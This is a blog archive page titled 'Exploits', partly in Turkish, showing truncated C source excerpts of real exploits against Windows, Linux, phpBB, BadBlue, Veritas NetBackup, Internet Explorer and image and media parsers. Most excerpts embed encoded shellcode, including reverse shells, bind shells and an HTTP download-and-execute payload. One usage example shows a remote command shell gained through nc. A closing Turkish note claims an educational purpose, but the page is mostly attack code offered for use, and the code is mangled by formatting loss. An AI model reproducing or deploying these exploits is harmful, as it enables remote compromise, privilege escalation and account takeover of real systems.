Category Archives: Exploits

  #include <stdio.h>#include <stdlib.h>#include <stdarg.h>#include <string.h>#include <sys/types.h>#include <sys/socket.h>#include <sys/time.h>#include <netinet/in.h>#include <arpa/inet.h>#include <unistd.h>#include <netdb.h>/*Connectback Shellcode ::: 316 byteLink points:Ip : [111] unsigned long (xored 0×99999999)Port: [118] unsigned short (xored 0×9999)*/unsigned char reverse_sc[] =“xEBx10x5Bx4Bx33xC9x66xB9x25x01x80x34x0Bx99xE2xFA”“xEBx05xE8xEBxFFxFFxFFx70x62x99x99x99xC6xFDx38xA9″“x99x99x99x12xD9x95x12xE9x85x34x12xF1x91x12x6ExF3″“x9DxC0x71x02x99x99x99x7Bx60xF1xAAxABx99x99 xF1xEE”“xEAxABxC6xCDx66x8Fx12x71xF3x9DxC0x71x1Bx99x99x99″“x7Bx60x18x75x09x98x99x99xCDxF1x98x98x99x99x66xCF”“x89xC9xC9xC9xC9xD9xC9xD9xC9x66xCFx8Dx12x41xF1xE6″“x99x99x98xF1x9Bx99x9Dx4Bx12x55xF3x89xC8xCAx66xCF”“x81x1Cx59xECxD3xF1xFAxF4xFDx99x10xFFxA9x1Ax75xCD”“x14xA5xBDxF3x8CxC0x32x7Bx64x5FxDDxBDx89xDDx67xDD”“xBDxA4x10xC5xBDxD1x10xC5xBDxD5x10xC5xBDxC9x14xDD”“xBDx89xCDxC9xC8xC8xC8xF3x98xC8xC8x66xEFxA9xC8x66″“xCFx9Dx12x55xF3x66x66xA8x66xCFx91xCAx66xCFx85x66″“xCFx95xC8xCFx12xDCxA5x12xCDxB1xE1x9Ax4CxCBx12xEB”“xB9x9Ax6CxAAx50xD0xD8x34x9Ax5CxAAx42x96x27x89xA3″“x4FxEDx91x58x52x94x9Ax43xD9x72x68xA2x86xECx7ExC3″“x12xC3xBDx9Ax44xFFx12x95xD2x12xC3x85x9Ax44x12x9D”“x12x9Ax5Cx32xC7xC0x5Ax71x99x66x66x66x17xD7x97x75″“xEBx67x2Ax8Fx34x40x9Cx57x76x57x79xF9x52x74x65xA2″“x40x90x6Cx34x75x60x33xF9x7ExE0x5FxE0″;/*Portbind Shellcode ::: 492 byteLink points:Port: [266] unsigned … Continue reading →

 #include <stdio.h>#include <sys/socket.h>#include <netinet/in.h>#include <netdb.h>/*** definitions**/#define PORT 2380#define RED “E[31mE[1m”#define GREEN “E[32mE[1m”#define YELLOW “E[33mE[1m”#define BLUE “E[34mE[1m”#define NORMAL “E[m”/*** prototypes**/int exploit ( int s, unsigned long ip, unsigned short cbport, intoption );int shell ( int s, char* tip, unsigned short cbport … Continue reading →

 #include <sys/klog.h>#include <sys/types.h>#include <unistd.h>#include <stdlib.h>#include <sys/socket.h>#include <bluetooth/bluetooth.h>#include <bluetooth/hci.h>#include <bluetooth/hci_lib.h>#include <sys/utsname.h>#define BRKVAL 0x0cec9000 //should be enough but fix it if you get an errorvoid usage(char *path);//due to changing task_structs we need different offsetschar k_give_root[] = //—-[ give root in ring0/tested onlinux2.6.5/x86/ … Continue reading →

 #include <stdio.h>#include <string.h>#include <windows.h>HKEY hKey;#define BUFSIZE 100char prgfiles[BUFSIZE];DWORD dwBufLen=BUFSIZE;LONG lRet;int main(){if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,“SOFTWAREMicrosoftWindowsCurrentVersion”,0,KEY_QUERY_VALUE,&hKey) == ERROR_SUCCESS){lRet = RegQueryValueEx( hKey, “ProgramFilesDir”, NULL,NULL,(LPBYTE) prgfiles, &dwBufLen);if( (lRet != ERROR_SUCCESS) || (dwBufLen >BUFSIZE) ){RegCloseKey(hKey);printf(“An error occured. Can’t getpassword! “);return -1;}RegCloseKey(hKey);}else{printf(“An error occured. Can’t get password! “);return -1;}char … Continue reading →

 #include <stdio.h>#include <string.h>#include <windows.h>HKEY hKey;#define BUFSIZE 100char prgfiles[BUFSIZE];DWORD dwBufLen=BUFSIZE;LONG lRet;int main(){if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,“SOFTWAREMicrosoftWindowsCurrentVersion”,0,KEY_QUERY_VALUE,&hKey) == ERROR_SUCCESS){lRet = RegQueryValueEx( hKey, “ProgramFilesDir”, NULL,NULL,(LPBYTE) prgfiles, &dwBufLen);if( (lRet != ERROR_SUCCESS) || (dwBufLen >BUFSIZE) ){RegCloseKey(hKey);printf(“An error occured. Can’t getpassword! “);return -1;}RegCloseKey(hKey);}else{printf(“An error occured. Can’t get password! “); return … Continue reading →

 Baslamadan önce exploit() fonksiyonu içindeki şifreyi değiştirin derim.     #include <stdio.h>#include <sys/socket.h>#include <sys/types.h>#include <sys/stat.h>#include <fcntl.h>#include <netinet/in.h>#include <netdb.h>#include <unistd.h>#define NOP 0×90#define RED “E[31mE[1m”#define GREEN “E[32mE[1m”#define YELLOW “E[33mE[1m”#define BLUE “E[34mE[1m”#define NORMAL “E[m”int connect_to_remote_host ( char* tip, unsigned short tport );int exploit … Continue reading →

 #include <stdio.h>#include <stdlib.h>#include <string.h>char pre[]=“<smil> “” <head> “” <layout> “” <region id=”a” top=”5″ /> “” </layout> “” </head> “” <body> “” <text src=”1024_768.en.txt” region=”size” system-screen-size=””;char shellcode[]=/* bindshell port 13579 thx to metasploit.com restricted chars: 0×00, 0×90, 0xa0, 0×20, 0x0a, 0x0d, … Continue reading →

 #include <stdio.h>#include <string.h>#include <tchar.h>char bug[]=“x40x63x73x73x20x6Dx6Dx7Bx49x7Bx63x6Fx6Ex74x65x6Ex74x3Ax20x22x22x3Bx2F”“x2Ax22x20x22x2Ax2Fx7Dx7Dx40x6Dx3Bx40x65x6Ex64x3Bx20x2Fx2Ax22x7Dx7Dx20x20x20″;///////////////////////////////////////////////////////*shellcode :MessageBox (0,”hack ie6″,0,MB_OK);-XOR EBX,EBXPUSH EBX ; 0PUSH EBX ; 0ADD AL,0FPUSH EAX ; Msg ” Hack ie6 “PUSH EBX ;0JMP 746D8E72 ;USER32.MessageBoxA*/char shellcode[]= “x33xDBx53x53x04x0Fx50x53xE9xCBx8Dx6Dx74″“x90x90x48x61x63x6Bx20x69x65x36x20x63x73x73″;////////////////////////////////////////////////////////// return address :: esp+1AC :: start shellcode//MOV EAX,ESP//ADD AX,1AC//CALL EAXchar ret[]= … Continue reading →

 #define _BSD_SOURCE#include <stdio.h>#include <ctype.h>#include <sys/socket.h>#include <netinet/in.h>#include <netinet/in_systm.h>#include <netinet/ip.h>#include <netinet/tcp.h>#include <sysexits.h>#include <stdlib.h>#include <unistd.h>#include <sys/types.h>/*Windows Server 2003 and XP SP2 remote DoS exploitTested under OpenBSD 3.6 at WinXP SP 2Vuln by Dejan Levaja <dejan_@_levaja.com>(c)oded by __blf 2005 RusH Security Team , http://rst.void.ruGr33tz: … Continue reading →

  #include <stdio.h>#include <stdlib.h>#include <conio.h>#include <string.h>#ifdef __BORLANDC__#include <mem.h>#endif#define NOP 0×90char png_header[] =“x89x50x4Ex47x0Dx0Ax1Ax0Ax00x00x00x0Dx49x48x44x52″“x00x00x00x40x00x00x00x40x08x03x00x00x00x9DxB7x81″“xECx00x00x01xB9x74x52x4Ex53″;char pngeof[] = “x90x90x90x59xE8x47xFExFFxFF”;/* Generic win32 http download shellcodexored with 0x1d by delikon (http://delikon.de/) */char shellcode[] = “xEB” “x10x58x31xC9x66x81xE9x22xFFx80x30x1Dx40xE2xFAxEBx05xE8xEBxFF”“xFFxFFxF4xD1x1Dx1Dx1Dx42xF5x4Bx1Dx1Dx1Dx94xDEx4Dx75x93x53x13″“xF1xF5x7Dx1Dx1Dx1Dx2CxD4x7BxA4x72x73x4Cx75x68x6Fx71x70x49xE2″“xCDx4Dx75x2Bx07x32x6DxF5x5Bx1Dx1Dx1Dx2CxD4x4Cx4Cx90x2Ax4Bx90″“x6Ax15x4Bx4CxE2xCDx4Ex75x85xE3x97x13xF5x30x1Dx1Dx1Dx4Cx4AxE2″“xCDx2CxD4x54xFFxE3x4Ex75x63xC5xFFx6ExF5x04x1Dx1Dx1DxE2xCDx48″“x4Bx79xBCx2Dx1Dx1Dx1Dx96x5Dx11x96x6Dx01xB0x96x75x15x94xF5x43″“x40xDEx4Ex48x4Bx4Ax96x71x39x05x96x58x21x96x49x18x65x1CxF7x96″“x57x05x96x47x3Dx1CxF6xFEx28x54x96x29x96x1CxF3x2CxE2xE1x2CxDD”“xB1x25xFDx69x1AxDCxD2x10x1CxDAxF6xEFx26x61x39x09x68xFCx96x47″“x39x1CxF6x7Bx96x11x56x96x47x01x1CxF6x96x19x96x1CxF5xF4x1Fx1D”“x1Dx1Dx2CxDDx94xF7x42x43x40x46xDExF5x32xE2xE2xE2x70x75x75x33″“x78x65x78x1D”;FILE *di;int i = 0;short int weblength;char *web;char *pointer = NULL;char … Continue reading →

  #include <stdio.h>#include <stdlib.h>#include <string.h>int main(int argc, char** argv[]) {FILE *pointer;char contenido[10000],cookie[91]=”a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%22″,cookief[9]=”%22%3B%7D”, cookiec[106],cookie_false[92]=”a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D”,*pos;int p=0, i=0;if (argc!=2) {printf(“Usage: phpbb_exploit.exe user_id “);exit(0);}pointer=fopen(“cookies.txt”, “r”);if (pointer) {fread(contenido, 300, 10, pointer);fclose(pointer);} else {printf(“The file can’t be open “);exit(0);}strcpy(cookiec, cookie);strncat(cookiec, argv[1], 6);strcat(cookiec, cookief);if (pos=strstr(contenido, cookiec)) {p=pos … Continue reading →

 #include <winsock2.h>#include <windows.h>#include <stdio.h>#pragma comment (lib,”ws2_32″)#define TIMEOUT 1#define VALIDSERVER “BadBlue/2.5″#define GETHEADER “HEAD HTTP/1.1 “#define HTTPSEND1 “GET /ext.dll?mfcisapicommand=”#define HTTPSEND2 “&page=index.htx HTTP/1.1 Accept: */* Accept-Language: es Accept-Encodin: gzip, deflate User-Agent: Haxorcitos/1.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: “#define HTTPSEND3 ” Connection: … Continue reading →

Targeted port : 13701/*DESCRIPTIONVeritas NetBackup Stack Overflow (tcp/13701)“Volume Manager Daemon” ModuleUSAGEC:NetBackup>nb 192.168.0.2 4444 192.168.0.200 0Veritas NetBackup v4/v5 “Volume Manager Daemon” Stack Overflow.C:NetBackup>nc 192.168.0.200 4444Microsoft Windows 2000 [versie 5.00.2195](C) Copyright 1985-2000 Microsoft Corp.C:WINNTsystem32>INFORMATIONI wrote this just for educational purposes .Because the … Continue reading →

#include <stdio.h>#include <winsock2.h>#pragma comment(lib, “ws2_32″)// Use for find the ASM code#define PROC_BEGIN __asm _emit 0×90 __asm _emit 0×90__asm _emit 0×90 __asm _emit 0×90__asm _emit 0×90 __asm _emit 0×90__asm _emit 0×90 __asm _emit 0×90#define PROC_END PROC_BEGIN#define SEARCH_STR “x90x90x90x90x90x90x90x90x90″#define SEARCH_LEN 8#define MAX_SC_LEN … Continue reading →

Buraya exploitlerin eklenmesindeki neden eğitimden başka hiçbirşey değildir. Lütfen yanlış yorumlamayınız. Exploit kodlarından nasıl eğitim olur diye sormayı düşünüyosanız eğer sormamanızı tavsiye ederim Çünkü bundan eğitim olamıycağını düşünüyorsanız işin çok başındasınız derim. Belirli bir programlama seviyesine ulaştıktan sonra herhangi bir … Continue reading →